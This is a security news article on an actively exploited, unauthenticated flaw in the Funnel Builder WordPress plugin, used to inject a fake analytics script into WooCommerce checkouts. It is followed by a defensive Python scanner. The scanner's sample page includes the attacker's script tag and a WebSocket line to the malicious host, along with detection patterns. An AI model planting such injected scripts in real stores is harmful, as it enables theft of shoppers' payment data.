A critical vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject malicious JavaScript snippets into WooCommerce checkout pages.
The flaw has not received an official identifier and can be leveraged without authentication. It affects all versions of the plugin before 3.15.0.3.
Funnel Builder is a WordPress plugin for WooCommerce checkout developed by FunnelKit. It is primarily used to customize checkout pages and offers features such as one-click upsells and landing pages aimed at improving conversion rates.
Based on statistics from WordPress.org, the Funnel Builder plugin is active on more than 40,000 websites.
E-commerce security company Sansec detected the malicious activity and noticed that the payload (analytics-reports[.]com/wss/jquery-lib.js) is disguised as a fake Google Tag Manager/Google Analytics script that opens a WebSocket connection to an external location (wss://protect-wss[.]com/ws).
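The two traits Sansec describes (a library-looking script served from a non-Google host, and an inline script opening a WebSocket to an outside domain) can be checked for directly in a rendered checkout page. The following is an added example, not Sansec's or FunnelKit's code; the trusted-host allowlist and the sample page are assumptions constructed for illustration.

```python
"""Hypothetical scanner for checkout-page HTML: flags third-party <script> tags
whose name imitates GTM/GA/jQuery assets, and inline scripts that open
WebSocket connections to hosts outside an allowlist."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist of hosts that legitimately serve tag-manager/analytics/jQuery assets.
TRUSTED_SCRIPT_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com",
                        "ajax.googleapis.com"}
LOOKALIKE = re.compile(r"(gtm|gtag|analytics|jquery)", re.I)  # blend-in keywords
WS_URL = re.compile(r"wss?://([A-Za-z0-9.-]+)")               # host of a ws(s) URL


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True
                self.inline.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data


def find_suspicious_scripts(html, site_host, trusted_ws_hosts=()):
    """Return (reason, value) findings for the given checkout-page HTML."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.srcs:
        host = urlparse(src).hostname or site_host  # relative src is first-party
        if host not in TRUSTED_SCRIPT_HOSTS and host != site_host and LOOKALIKE.search(src):
            findings.append(("lookalike-external-script", src))
    for code in p.inline:
        for ws_host in WS_URL.findall(code):
            if ws_host not in trusted_ws_hosts and ws_host != site_host:
                findings.append(("websocket-to-unknown-host", ws_host))
    return findings


# Constructed sample page mirroring the injection described in the article.
SAMPLE_HTML = """<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script src="https://shop.example/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://analytics-reports.com/wss/jquery-lib.js"></script>
<script>var s = new WebSocket("wss://protect-wss.com/ws");</script>
</head><body>checkout</body></html>"""

if __name__ == "__main__":
    for reason, value in find_suspicious_scripts(SAMPLE_HTML, "shop.example"):
        print(reason, value)
```

Running it against a live store means fetching the checkout page as a browser would (plugins can inject the script only at render time), so compare the output against a baseline taken from a known-clean install.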